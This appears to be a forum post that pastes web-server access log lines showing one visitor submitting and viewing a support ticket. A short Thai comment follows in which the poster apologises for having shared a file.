58.9.20.41 - - [25/Jan/2012:01:24:14 +0700] "GET /templates/default/img/fa-icon.png HTTP/1.1" 200 4059 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:40 +0700] "GET /submitticket.php HTTP/1.1" 200 2419 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:41 +0700] "GET /images/emails.gif HTTP/1.1" 200 1524 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:44 +0700] "GET /submitticket.php?step=2&deptid=2 HTTP/1.1" 200 3230 "http://mydomain.com/submitticket.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:44 +0700] "GET /includes/verifyimage.php HTTP/1.1" 200 2398 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:44 +0700] "GET /images/add.gif HTTP/1.1" 200 1092 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:53 +0700] "POST /submitticket.php HTTP/1.1" 200 734 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:55 +0700] "POST /submitticket.php?step=3 HTTP/1.1" 302 766 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:55 +0700] "GET /submitticket.php?step=4 HTTP/1.1" 200 2318 "https://mydomain.com/submitticket.php?step=2&deptid=2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

58.9.20.41 - - [25/Jan/2012:01:24:57 +0700] "GET /viewticket.php?tid=300655&c=xHrbURKz HTTP/1.1" 200 4494 "https://mydomain.com/submitticket.php?step=4" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"

11163 · January 27, 2012, 8:35pm

ผมไม่น่าเอาไฟล์มาปล่อยเลย เอาไฟล์มาแล้วเงียบ ก็คิดว่า มีเรื่องแน่ๆ ขอโทษด้วยครับ